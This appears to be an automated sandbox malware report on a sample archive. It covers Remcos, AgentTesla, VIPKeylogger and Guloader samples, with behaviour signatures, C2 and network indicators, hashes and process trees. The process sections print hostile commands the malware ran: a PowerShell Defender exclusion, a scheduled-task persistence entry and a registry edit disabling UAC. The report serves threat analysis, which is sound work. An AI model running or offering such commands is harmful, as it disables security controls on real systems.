Analysis Overview
SHA256
9711e0f1f4b1ea97ecf7ddfe05b27c8f712533c2141f6e2b064d636076e76652
Threat Level: Known bad
The file malware-collection.zip was found to be: Known bad.
Malicious Activity Summary
Remcos
Vipkeylogger family
Remcos family
AgentTesla
Guloader family
UAC bypass
Guloader,Cloudeye
VIPKeylogger
Agenttesla family
Detected Nirsoft tools
NirSoft MailPassView
NirSoft WebBrowserPassView
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Uses browser remote debugging
Executes dropped EXE
Checks computer location settings
Drops startup file
Reads user/profile data of web browsers
Reads WinSCP keys stored on the system
Reads user/profile data of local email clients
Reads data files stored by FTP clients
Loads dropped DLL
Looks up external IP address via web service
Accesses Microsoft Outlook accounts
Legitimate hosting services abused for malware hosting/C2
Network Service Discovery
Accesses Microsoft Outlook profiles
Suspicious use of NtSetInformationThreadHideFromDebugger
AutoIT Executable
Suspicious use of SetThreadContext
Suspicious use of NtCreateThreadExHideFromDebugger
Drops file in Program Files directory
Drops file in Windows directory
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Unsigned PE
Browser Information Discovery
System Network Configuration Discovery: Internet Connection Discovery
Scheduled Task/Job: Scheduled Task
Enumerates system info in registry
Suspicious use of FindShellTrayWindow
Modifies registry key
Runs ping.exe
outlook_office_path
outlook_win_path
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Suspicious behavior: MapViewOfSection
Suspicious use of SetWindowsHookEx
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-11-06 02:10
Signatures
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral7
Detonation Overview
Submitted
2024-11-06 02:10
Reported
2024-11-06 02:13
Platform
win10ltsc2021-20241023-en
Max time kernel
145s
Max time network
151s
Command Line
Signatures
VIPKeylogger
Vipkeylogger family
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Produccion.exe | N/A |
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-4074627901-37362009-3519777259-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\Produccion.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4074627901-37362009-3519777259-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\Produccion.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4074627901-37362009-3519777259-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\Produccion.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | checkip.dyndns.org | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Produccion.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Produccion.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Produccion.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2028 set thread context of 2576 | N/A | C:\Users\Admin\AppData\Local\Temp\Produccion.exe | C:\Users\Admin\AppData\Local\Temp\Produccion.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\rollerskater.lnk | C:\Users\Admin\AppData\Local\Temp\Produccion.exe | N/A |
| File opened for modification | C:\Program Files (x86)\rollerskater.lnk | C:\Users\Admin\AppData\Local\Temp\Produccion.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Produccion.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Produccion.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Produccion.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Produccion.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Produccion.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Produccion.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2028 wrote to memory of 2576 | N/A | C:\Users\Admin\AppData\Local\Temp\Produccion.exe | C:\Users\Admin\AppData\Local\Temp\Produccion.exe |
| PID 2028 wrote to memory of 2576 | N/A | C:\Users\Admin\AppData\Local\Temp\Produccion.exe | C:\Users\Admin\AppData\Local\Temp\Produccion.exe |
| PID 2028 wrote to memory of 2576 | N/A | C:\Users\Admin\AppData\Local\Temp\Produccion.exe | C:\Users\Admin\AppData\Local\Temp\Produccion.exe |
| PID 2028 wrote to memory of 2576 | N/A | C:\Users\Admin\AppData\Local\Temp\Produccion.exe | C:\Users\Admin\AppData\Local\Temp\Produccion.exe |
| PID 2028 wrote to memory of 2576 | N/A | C:\Users\Admin\AppData\Local\Temp\Produccion.exe | C:\Users\Admin\AppData\Local\Temp\Produccion.exe |
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-4074627901-37362009-3519777259-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\Produccion.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-4074627901-37362009-3519777259-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\Produccion.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Produccion.exe
"C:\Users\Admin\AppData\Local\Temp\Produccion.exe"
C:\Users\Admin\AppData\Local\Temp\Produccion.exe
"C:\Users\Admin\AppData\Local\Temp\Produccion.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 142.250.187.206:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.187.227:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | 206.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| GB | 142.250.187.227:80 | o.pki.goog | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 172.217.16.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 225.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | checkip.dyndns.org | udp |
| JP | 132.226.8.169:80 | checkip.dyndns.org | tcp |
| US | 8.8.8.8:53 | reallyfreegeoip.org | udp |
| US | 104.21.67.152:443 | reallyfreegeoip.org | tcp |
| US | 8.8.8.8:53 | 169.8.226.132.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.67.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\nsi6821.tmp\System.dll
| MD5 | ee260c45e97b62a5e42f17460d406068 |
| SHA1 | df35f6300a03c4d3d3bd69752574426296b78695 |
| SHA256 | e94a1f7bcd7e0d532b660d0af468eb3321536c3efdca265e61f9ec174b1aef27 |
| SHA512 | a98f350d17c9057f33e5847462a87d59cbf2aaeda7f6299b0d49bb455e484ce4660c12d2eb8c4a0d21df523e729222bbd6c820bf25b081bc7478152515b414b3 |
memory/2028-14-0x0000000076F41000-0x0000000077061000-memory.dmp
memory/2028-15-0x0000000076F41000-0x0000000077061000-memory.dmp
memory/2028-16-0x0000000010004000-0x0000000010005000-memory.dmp
memory/2576-17-0x0000000076FC8000-0x0000000076FC9000-memory.dmp
memory/2576-18-0x0000000076FE5000-0x0000000076FE6000-memory.dmp
memory/2576-31-0x0000000000480000-0x00000000016D3000-memory.dmp
memory/2576-33-0x0000000076F41000-0x0000000077061000-memory.dmp
memory/2576-34-0x0000000071DCE000-0x0000000071DCF000-memory.dmp
memory/2576-35-0x0000000000480000-0x00000000004C8000-memory.dmp
memory/2576-36-0x0000000039830000-0x0000000039DD6000-memory.dmp
memory/2576-37-0x0000000039DE0000-0x0000000039E7C000-memory.dmp
memory/2576-38-0x0000000071DC0000-0x0000000072571000-memory.dmp
memory/2576-39-0x0000000071DCE000-0x0000000071DCF000-memory.dmp
memory/2576-40-0x000000003A2E0000-0x000000003A4A2000-memory.dmp
memory/2576-41-0x000000003A4D0000-0x000000003A520000-memory.dmp
memory/2576-43-0x0000000071DC0000-0x0000000072571000-memory.dmp
memory/2576-44-0x000000003A5B0000-0x000000003A642000-memory.dmp
memory/2576-45-0x000000003A680000-0x000000003A68A000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-06 02:10
Reported
2024-11-06 02:13
Platform
win10ltsc2021-20241023-en
Max time kernel
145s
Max time network
150s
Command Line
Signatures
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\103024_37663.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\103024_37663.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\103024_37663.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\103024_37663.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2504 set thread context of 5108 | N/A | C:\Users\Admin\AppData\Local\Temp\103024_37663.exe | C:\Users\Admin\AppData\Local\Temp\103024_37663.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\103024_37663.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\103024_37663.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\103024_37663.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2504 wrote to memory of 5108 | N/A | C:\Users\Admin\AppData\Local\Temp\103024_37663.exe | C:\Users\Admin\AppData\Local\Temp\103024_37663.exe |
| PID 2504 wrote to memory of 5108 | N/A | C:\Users\Admin\AppData\Local\Temp\103024_37663.exe | C:\Users\Admin\AppData\Local\Temp\103024_37663.exe |
| PID 2504 wrote to memory of 5108 | N/A | C:\Users\Admin\AppData\Local\Temp\103024_37663.exe | C:\Users\Admin\AppData\Local\Temp\103024_37663.exe |
| PID 2504 wrote to memory of 5108 | N/A | C:\Users\Admin\AppData\Local\Temp\103024_37663.exe | C:\Users\Admin\AppData\Local\Temp\103024_37663.exe |
| PID 2504 wrote to memory of 5108 | N/A | C:\Users\Admin\AppData\Local\Temp\103024_37663.exe | C:\Users\Admin\AppData\Local\Temp\103024_37663.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\103024_37663.exe
"C:\Users\Admin\AppData\Local\Temp\103024_37663.exe"
C:\Users\Admin\AppData\Local\Temp\103024_37663.exe
"C:\Users\Admin\AppData\Local\Temp\103024_37663.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | kmsaksesuar.com | udp |
| US | 44.28.239.165:443 | kmsaksesuar.com | tcp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 44.28.239.165:443 | kmsaksesuar.com | tcp |
| US | 44.28.239.165:443 | kmsaksesuar.com | tcp |
| US | 44.28.239.165:443 | kmsaksesuar.com | tcp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 44.28.239.165:443 | kmsaksesuar.com | tcp |
| US | 44.28.239.165:443 | kmsaksesuar.com | tcp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 44.28.239.165:443 | kmsaksesuar.com | tcp |
| US | 44.28.239.165:443 | kmsaksesuar.com | tcp |
| US | 44.28.239.165:443 | kmsaksesuar.com | tcp |
| US | 44.28.239.165:443 | kmsaksesuar.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\nssA569.tmp\System.dll
| MD5 | 8b3830b9dbf87f84ddd3b26645fed3a0 |
| SHA1 | 223bef1f19e644a610a0877d01eadc9e28299509 |
| SHA256 | f004c568d305cd95edbd704166fcd2849d395b595dff814bcc2012693527ac37 |
| SHA512 | d13cfd98db5ca8dc9c15723eee0e7454975078a776bce26247228be4603a0217e166058ebadc68090afe988862b7514cb8cb84de13b3de35737412a6f0a8ac03 |
memory/2504-14-0x0000000077381000-0x00000000774A1000-memory.dmp
memory/2504-15-0x0000000010004000-0x0000000010005000-memory.dmp
memory/5108-16-0x0000000000400000-0x0000000001653000-memory.dmp
memory/5108-17-0x0000000077381000-0x00000000774A1000-memory.dmp
memory/5108-18-0x0000000077408000-0x0000000077409000-memory.dmp
memory/5108-19-0x0000000077425000-0x0000000077426000-memory.dmp
memory/5108-20-0x0000000000400000-0x0000000001653000-memory.dmp
memory/5108-21-0x0000000077381000-0x00000000774A1000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2024-11-06 02:10
Reported
2024-11-06 02:13
Platform
win10ltsc2021-20241023-en
Max time kernel
98s
Max time network
139s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\AWB #281024..scr | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3088 set thread context of 4284 | N/A | C:\Users\Admin\AppData\Local\Temp\AWB #281024..scr | C:\Users\Admin\AppData\Local\Temp\AWB #281024..scr |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\AWB #281024..scr | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\AWB #281024..scr
"C:\Users\Admin\AppData\Local\Temp\AWB #281024..scr" /S
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\zrjxKRHUf.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zrjxKRHUf" /XML "C:\Users\Admin\AppData\Local\Temp\tmpCFA4.tmp"
C:\Users\Admin\AppData\Local\Temp\AWB #281024..scr
"C:\Users\Admin\AppData\Local\Temp\AWB #281024..scr"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fd.api.iris.microsoft.com | udp |
| IE | 20.223.35.26:443 | fd.api.iris.microsoft.com | tcp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
Files
memory/3088-0-0x000000007473E000-0x000000007473F000-memory.dmp
memory/3088-1-0x00000000001A0000-0x000000000029A000-memory.dmp
memory/3088-2-0x0000000005310000-0x00000000058B6000-memory.dmp
memory/3088-3-0x0000000004C90000-0x0000000004D22000-memory.dmp
memory/3088-4-0x0000000004C70000-0x0000000004C7A000-memory.dmp
memory/3088-5-0x0000000074730000-0x0000000074EE1000-memory.dmp
memory/3088-6-0x0000000004E10000-0x0000000004E2E000-memory.dmp
memory/3088-7-0x000000007473E000-0x000000007473F000-memory.dmp
memory/3088-8-0x0000000074730000-0x0000000074EE1000-memory.dmp
memory/3088-9-0x0000000002690000-0x000000000271E000-memory.dmp
memory/3088-10-0x000000000E5E0000-0x000000000E67C000-memory.dmp
memory/1276-13-0x0000000074730000-0x0000000074EE1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmpCFA4.tmp
| MD5 | da65156b9bb01d72c2e305bf225da30d |
| SHA1 | 482559666fa0ae88b5e89e44766d09e6a3b0d606 |
| SHA256 | 48b7c1f6dcbc8c89427d902b1bc65dda7d940a2bb48e7b51a8b7c53f5d1a84e7 |
| SHA512 | 580bdde6db2cb9cb1b47d74469250fdf49c893993aa613bdcbff7e92e66a97579ad92a149875657241cd11ae4ffa0ca299e438c28d3beefe38dcbf682553cd14 |
memory/1276-14-0x0000000002390000-0x00000000023C6000-memory.dmp
memory/4284-15-0x0000000000400000-0x0000000000447000-memory.dmp
memory/1276-16-0x00000000050B0000-0x000000000577A000-memory.dmp
memory/1276-18-0x0000000074730000-0x0000000074EE1000-memory.dmp
memory/4284-19-0x0000000000400000-0x0000000000447000-memory.dmp
memory/3088-20-0x0000000074730000-0x0000000074EE1000-memory.dmp
memory/1276-21-0x0000000004F10000-0x0000000004F32000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cxzwchln.jj3.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1276-28-0x0000000005780000-0x00000000057E6000-memory.dmp
memory/1276-22-0x0000000004FB0000-0x0000000005016000-memory.dmp
memory/1276-33-0x00000000058F0000-0x0000000005C47000-memory.dmp
memory/1276-34-0x0000000005D40000-0x0000000005D5E000-memory.dmp
memory/1276-35-0x0000000005D80000-0x0000000005DCC000-memory.dmp
memory/1276-37-0x0000000070FD0000-0x000000007101C000-memory.dmp
memory/1276-50-0x0000000006330000-0x000000000634E000-memory.dmp
memory/1276-48-0x00000000049D0000-0x00000000049E0000-memory.dmp
memory/1276-36-0x0000000006F70000-0x0000000006FA2000-memory.dmp
memory/1276-49-0x00000000049D0000-0x00000000049E0000-memory.dmp
memory/1276-47-0x000000007F4E0000-0x000000007F4F0000-memory.dmp
memory/1276-51-0x0000000006FB0000-0x0000000007053000-memory.dmp
memory/1276-52-0x00000000076F0000-0x0000000007D6A000-memory.dmp
memory/1276-53-0x00000000070B0000-0x00000000070CA000-memory.dmp
memory/1276-54-0x0000000007110000-0x000000000711A000-memory.dmp
memory/4284-55-0x0000000001430000-0x000000000177C000-memory.dmp
memory/1276-56-0x0000000007320000-0x00000000073B6000-memory.dmp
memory/1276-57-0x0000000074730000-0x0000000074EE1000-memory.dmp
memory/1276-58-0x00000000049D0000-0x00000000049E0000-memory.dmp
memory/1276-61-0x0000000074730000-0x0000000074EE1000-memory.dmp
memory/4284-62-0x0000000000400000-0x0000000000447000-memory.dmp
memory/4284-63-0x0000000000400000-0x0000000000447000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2024-11-06 02:10
Reported
2024-11-06 02:13
Platform
win10ltsc2021-20241023-en
Max time kernel
149s
Max time network
147s
Command Line
Signatures
Remcos
Remcos family
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
Detected Nirsoft tools
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
NirSoft MailPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
NirSoft WebBrowserPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Uses browser remote debugging
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Accesses Microsoft Outlook accounts
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Windows\SysWOW64\msiexec.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Network Service Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4800 set thread context of 4656 | N/A | C:\Windows\SysWOW64\msiexec.exe | C:\Windows\SysWOW64\msiexec.exe |
| PID 4800 set thread context of 4944 | N/A | C:\Windows\SysWOW64\msiexec.exe | C:\Windows\SysWOW64\msiexec.exe |
| PID 4800 set thread context of 1120 | N/A | C:\Windows\SysWOW64\msiexec.exe | C:\Windows\SysWOW64\msiexec.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SystemTemp | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
